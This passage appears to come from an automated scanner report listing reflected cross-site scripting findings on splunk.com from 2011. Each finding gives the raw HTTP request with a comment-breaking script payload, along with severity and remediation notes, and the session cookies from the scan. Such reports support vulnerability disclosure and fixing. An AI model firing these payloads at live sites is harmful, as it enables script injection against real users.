GET /view/partner-programs4b65f--><script>alert(1)</script>5ef7156cb2e/SP-CAAACED HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 3 is copied into an HTML comment. The payload 3e9a0--><script>alert(1)</script>3fa78d2d651 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/partner-programs/SP-CAAACED3e9a0--><script>alert(1)</script>3fa78d2d651 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.583. http://www.splunk.com/view/partner-programs/SP-CAAACED [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /view/partner-programs/SP-CAAACED
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ae883--><script>alert(1)</script>4cfbb6dd937 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/partner-programs/SP-CAAACED?ae883--><script>alert(1)</script>4cfbb6dd937=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:17:33 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23717
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload e0baa--><script>alert(1)</script>ff9655a5702 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /viewe0baa--><script>alert(1)</script>ff9655a5702/product-tour/SP-CAAAAGV HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:14:30 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:44:30 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:44:30 GMT; path=/ ETag: 430093ac36dde99606192c99a40d63b31296944070 Last-Modified: Sat, 05 Feb 2011 22:14:30 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18383
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 94af9--><script>alert(1)</script>0a646c51a07 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/product-tour94af9--><script>alert(1)</script>0a646c51a07/SP-CAAAAGV HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 3 is copied into an HTML comment. The payload c0811--><script>alert(1)</script>45674de8132 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/product-tour/SP-CAAAAGVc0811--><script>alert(1)</script>45674de8132 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.587. http://www.splunk.com/view/product-tour/SP-CAAAAGV [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /view/product-tour/SP-CAAAAGV
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 1e7d6--><script>alert(1)</script>b86e20e506a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/product-tour/SP-CAAAAGV?1e7d6--><script>alert(1)</script>b86e20e506a=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:13:53 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 103f9f7f8215d15990f0d507a8e205471296944034 Last-Modified: Sat, 05 Feb 2011 22:13:54 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27809
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 807a2--><script>alert(1)</script>91ab61ec940 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view807a2--><script>alert(1)</script>91ab61ec940/professional-services/SP-CAAABH9 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload 61dcc--><script>alert(1)</script>1db00d188d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/professional-services61dcc--><script>alert(1)</script>1db00d188d1/SP-CAAABH9 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 3 is copied into an HTML comment. The payload 3015d--><script>alert(1)</script>ed02e14b7a7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/professional-services/SP-CAAABH93015d--><script>alert(1)</script>ed02e14b7a7 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.591. http://www.splunk.com/view/professional-services/SP-CAAABH9 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /view/professional-services/SP-CAAABH9
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload f4445--><script>alert(1)</script>c7249b67761 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/professional-services/SP-CAAABH9?f4445--><script>alert(1)</script>c7249b67761=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:19:53 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 37390
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 7309a--><script>alert(1)</script>a075b8cd53e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view7309a--><script>alert(1)</script>a075b8cd53e/resources/SP-CAAACGF HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload 88525--><script>alert(1)</script>542705b5975 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/resources88525--><script>alert(1)</script>542705b5975/SP-CAAACGF HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 3 is copied into an HTML comment. The payload 144ec--><script>alert(1)</script>639ac29d6d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
